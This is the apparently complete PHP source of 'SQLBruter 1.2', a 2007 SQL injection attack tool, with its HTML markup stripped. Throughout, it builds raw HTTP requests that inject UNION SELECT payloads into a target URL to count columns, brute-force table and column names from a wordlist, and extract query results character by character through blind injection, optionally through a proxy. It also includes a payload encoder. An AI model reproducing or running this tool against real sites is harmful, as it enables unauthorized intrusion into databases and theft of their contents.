"; if ((!isset($_POST['submit'])) && (!isset($_GET['encode']))) { die ("

SQLBruter 1.2

" ); } elseif (isset($_GET['encode'])) { $strconv = $_POST['strconv_post']; $len = strlen($strconv); echo "

SQLBruter 1.2

"; for ($i = 0; $i < $len; $i++) { $substring = substr($strconv,$i,1); $ascii_code = ord($substring); if ($i == ($len - 1)) $res .= $ascii_code; else $res .= $ascii_code.","; } if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null; if (($len > 0) && (isset($_POST['submit_encode']))) $hex = "0x".bin2hex($strconv); else $hex = null; if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv); if(isset($_POST['submit_encode']))$md5= md5($strconv); if(isset($_POST['submit_encode']))$sha1 = sha1($strconv); echo "

ASCII (SQL syntax)

HEX

BASE64

MD5

SHA1

Raz0r 2007 ©

"; die; } if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL"); if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING"); if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE"); if (!empty($_POST['log_post'])) $log = $_POST['log_post']; if (!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post']; $c = preg_match($proxy_regex,$proxy); if (!$c) die("NOT A VALID PROXY"); $conn = @parse_url($url); $host = $conn["host"]; $path = $conn["path"]; $param = $conn["query"]; if (isset($conn["port"])) $port = $conn["port"]; else $port=80; switch ($mode) { case 1: if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS"); if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post']; if ($getcols == "on") $getcols = 1; else $getcols = 0; show_params(); mode1($url, $string, $max, $getcols); break; case 2: if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS"); if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY"); if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post']; show_params(); brute($url, $string, $rows, $dic, FALSE); break; case 3: if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS"); if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY"); if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE"); show_params(); brute($url, $string, $rows, $dic, $table); break; case 4: if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY"); if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97; if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122; show_params(); mode4($url, $string, $query, $ot, $do); break; } function mode_name($mode) { $modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns bruteforce", "Character-oriented bruteforce"); return $modes[$mode-1]; } function show_params() { global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do; $mode_name = mode_name($mode); echo "

SQLBruter 1.2

URL

".htmlspecialchars($url)."

String

".htmlspecialchars($string)."

Mode

".htmlspecialchars($mode_name)."

"; if (isset($log)) echo "

Log file

".htmlspecialchars($log)."

"; if (isset($proxy)) echo "

Proxy

".htmlspecialchars($proxy)."

"; switch ($mode) { case 1: echo "

Rows max number

".htmlspecialchars($max)."

"; break; case 2: echo "

Number of the selected rows

".htmlspecialchars($rows)."

"; echo "

Dictionary

".htmlspecialchars($dic)." (".checkdic($dic)." words)

"; if (isset($pref)) echo "

Prefix

".htmlspecialchars($pref)."

"; break; case 3: echo "

Number of the selected rows

".htmlspecialchars($rows)."

"; echo "

Dictionary

".htmlspecialchars($dic)." (".checkdic($dic)." words)

"; echo "

Table

".htmlspecialchars($table)."

"; break; case 4: echo "

Query

".htmlspecialchars($query)."

"; echo "

From

".htmlspecialchars($ot)."

"; echo "

To	".htmlspecialchars($do)."

"; break; } echo "

"; flush(); } function sendpacket($packet) { global $host, $port, $proxy; if (empty($proxy)) { $ock = @fsockopen(@gethostbyname($host),$port); stream_set_blocking($ock, 0); stream_set_timeout($ock,600); if (!$ock) { echo "No response from ".$host.":80
"; } else { fputs($ock, $packet); $html=""; while (!feof($ock)) { $html.=fgets($ock); } } } else { $parts=explode(":",$proxy); $ock2=@fsockopen($parts[0],$parts[1]); if (!$ock2) { echo "No response from proxy ($proxy)"; } else { fputs($ock2,$packet); $html=""; while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock2,1); } } } return $html; } function savelogfile($logfile, $mode, $text) { if (!is_file($logfile)) { $s = @fopen($logfile,"w"); fclose($s); chmod($logfile,0777); } $fp = @fopen($logfile,"a"); fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n"); fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n"); fputs($fp, "____________________________________________________________________\r\n"); fclose($fp); } function checkdic($dic) { $handle = @fopen($dic, "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $x++; } fclose($handle); } else die("INVALID DICTIONARY"); return $x; } function mode1($url, $string, $max, $getcols) { global $log, $proxy, $host, $path, $param; echo ""; flush(); for ($i = 0; $i < $max; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); if (strpos($content, $string)>0) { if ($getcols == 1) { for ($z = 1; $z <= ($i+1); $z++) { if ($z > 1) $razor .=",0x72617a3072".bin2hex($z); else $razor = "0x72617a3072".bin2hex($z); } $temp = explode("=", $param); $temp[(sizeof($temp)-1)] = "-1"; $param = implode("=", $temp); $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); for ($y = 1; $y <= ($i+1); $y++) { if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y; } if (!is_array($visiblecols)) {$nocols = 1;} } echo ""; echo "

Number of rows is ".($i+1)."
"; if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/*
Columns ".@implode(",", $visiblecols)." can output information";} elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/*
No columns which can output information"; else $result = $url." UNION SELECT ".$null."/*"; echo $result; echo "

"; flush(); if (isset($log)) {$result = str_replace("
", "\r\n", $result); savelogfile($log, 1, $result);} die; } } echo ""; flush(); } function brute($url, $string, $rows, $dic, $table) { global $log, $proxy, $pref, $host, $path, $param; $x = checkdic($dic); echo ""; flush(); $handle = @fopen($dic, "r"); if ($handle) { $begin_time = time(); if ($table === FALSE) { for ($i = 0; $i < $rows; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } else { for ($i = 0; $i < ($rows-1); $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } for ($i = 0; $i < $x; $i++) { $word = fgets($handle, 4096); $word = ereg_replace("\n", "", $word); $word = ereg_replace("\r", "", $word); $word = trim($word); if (isset($pref)) $word = $pref."_".$word; if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " "))) { if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n"; else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); $z++; $r++; if ($begin_time + 1 == time()) { $begin_time += 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo ""; flush(); } elseif ($begin_time + 1 < time()) { $begin_time = time() + 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo ""; flush(); } if (strpos($content, $string)>0) { if ($table === FALSE) { $result = $url." UNION SELECT ".$null." FROM ".$word."/*"; echo "

Table was found - $word
$result

"; } else { $result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*"; echo "

Column was found - $word
$result

"; } flush(); if (isset($log)) { if ($table === FALSE) savelogfile($log, 2, $result); else savelogfile($log, 3, $result); } } } } } } function found($min, $max, $sp, $result) { if (($max-$min)<5) crack($min,$max, $sp, $result); $r = round($max - ($max-$min)/2); $check = ">$r"; if ( check($check, $sp, $result)) { if (!empty($result)) $status = "(".$result.")"; print ""; flush(); found($r,$max, $sp, $result); } else { if (!empty($result)) $status = "(".$result.")"; print ""; flush(); found($min,$r+1, $sp, $result); } } function crack($cmin, $cmax, $sp, $result) { global $ot, $do, $output, $query; $i = $cmin; $check1 = ">0"; if (check($check1, $sp, $result)) { while ($i<=$cmax) { $check = "=$i"; if (!empty($result)) $status = "(".$result.")"; echo ""; flush(); if (check($check, $sp, $result)) { $result .= chr($i); $sp++; if (!isset($ot) || !isset($do)) { $ot = 97; $do = 122; } found($ot, $do, $sp, $result); } $i++; } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo ""; flush(); die; } else { if (isset($output)) save_result("\n Query ".$query." - ".$result."\n"); echo ""; flush(); die(""); } } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo ""; flush(); die; } else die("

$query - $result

"); } function check($check, $sp, $result) { global $path, $host, $param, $query, $string; $packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strpos($html,$string) > 0) return 1; return 0; } function mode4($url, $string, $query, $ot, $do) { global $log, $proxy, $host, $path, $param; echo ""; flush(); found($ot, $do, 1, ""); } if (($mode_post == 2) || ($mode_post == 3) ) echo ""; echo ""; flush(); ?>